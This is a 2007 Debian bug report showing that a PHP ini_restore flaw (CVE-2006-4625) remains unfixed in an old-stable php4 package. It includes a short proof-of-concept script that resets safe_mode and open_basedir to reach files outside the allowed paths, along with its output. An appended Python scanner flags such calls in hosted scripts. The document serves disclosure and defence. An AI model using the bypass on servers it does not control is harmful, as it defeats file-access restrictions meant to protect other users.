[php-maint] Bug#424937: libapache2-mod-php4: CVE-2006-4625 not fixed on old stable
Etienne Carriere
digits at rez-gif.supelec.fr
Thu May 17 22:03:46 UTC 2007
Package: libapache2-mod-php4
Version: 4:4.3.10-20
Severity: important
I would like to verify if it is still possible to use the ini_restore
bug on our server. I determined that it is still possible:
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include("/etc/passwdd");
ini_restore("safe_mode");
ini_restore("open_basedir");
include("/etc/passwdd");
?>
gives:
1
/home/webusers/JdR:/usr/share:/tmp
Warning: main(): open_basedir restriction in effect. File(/etc/passwdd)
is not within the allowed path(s): (/home/webusers/JdR:/usr/share:/tmp)
in /home/webusers/JdR/html/test.php on line 4
Warning: main(/etc/passwdd): failed to open stream: Operation not
permitted in /home/webusers/JdR/html/test.php on line 4
Warning: main(): Failed opening '/etc/passwdd' for inclusion
(include_path='.:/usr/share/fpdf:/usr/share/jpgraph/') in
/home/webusers/JdR/html/test.php on line 4
File with the permissions of /etc/passwd
So I think that this security hole is still real in this 4.3
(and the bug is only corrected in the 4.4.4 version)
-- System Information:
Debian Release: 3.1
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.14.3n
Locale: LANG=fr_FR@euro, LC_CTYPE=fr_FR@euro (charmap=ISO-8859-15)
Versions of packages libapache2-mod-php4 depends on:
ii  apache2-mpm-prefork  2.0.54-5sarge1      traditional model for Apache2
ii  libbz2-1.0           1.0.2-7             high-quality block-sorting file co
ii  libc6                2.3.2.ds1-22sarge6  GNU C Library: Shared libraries an
ii  libcomerr2           1.37-2sarge1        common error description library
ii  libdb4.2             4.2.52-18           Berkeley v4.2 Database Libraries [
ii  libexpat1            1.95.8-3            XML parsing C library - runtime li
ii  libkrb53             1.3.6-2sarge4       MIT Kerberos runtime libraries
ii  libmagic1            4.12-1sarge1        File type determination library us
ii  libpcre3             4.5-1.2sarge1       Perl 5 Compatible Regular Expressi
ii  libssl0.9.7          0.9.7e-3sarge4      SSL shared libraries
ii  libzzip-0-12         0.12.83-4           library providing read access on Z
ii  mime-support         3.28-1              MIME files 'mime.types' & 'mailcap
ii  php4-common          4:4.3.10-20         Common files for packages built fr
ii  zlib1g               1:1.2.2-4.sarge.2   compression library - runtime
-- no debconf information
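
For administrators of a shared host like the one in this report, a static scan of hosted scripts for ini_restore() calls on safe_mode or open_basedir is a quick triage step. The Python below is an added example, not part of the original report or of the Debian package; the function names, verdict labels and sample script are constructed for illustration.

```python
import re
from pathlib import Path

# Directives the report shows being reset to their php.ini defaults.
GUARDED = {"safe_mode", "open_basedir"}

# PHP function names are case-insensitive and may be followed by whitespace.
CALL = re.compile(r"\bini_restore\s*\(\s*([^)]*?)\s*\)", re.IGNORECASE)
# A plain quoted directive name, e.g. "safe_mode" or 'open_basedir'.
LITERAL = re.compile(r"""^(['"])([\w.]+)\1$""")


def scan_php(source):
    """Return (line, argument, verdict) for each ini_restore() call worth a look."""
    findings = []
    for m in CALL.finditer(source):
        arg = m.group(1)
        line = source.count("\n", 0, m.start()) + 1
        lit = LITERAL.match(arg)
        if lit is None:
            # Variable or expression: the directive cannot be known statically.
            findings.append((line, arg, "review"))
        elif lit.group(2) in GUARDED:
            findings.append((line, lit.group(2), "guarded"))
    return findings


def scan_tree(root):
    """Scan every *.php file under root; returns {path: findings} for hits only."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = scan_php(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits


# Constructed sample input, modelled on the test script in the report.
SAMPLE = """<?
echo ini_get("open_basedir");
ini_restore("safe_mode");
INI_RESTORE ( 'open_basedir' );
ini_restore("include_path");
ini_restore($name);
?>"""

if __name__ == "__main__":
    for line, arg, verdict in scan_php(SAMPLE):
        print(f"line {line}: ini_restore({arg}) -> {verdict}")
```

A "guarded" hit names one of the two directives directly; a "review" hit passes a non-literal argument and needs a manual look.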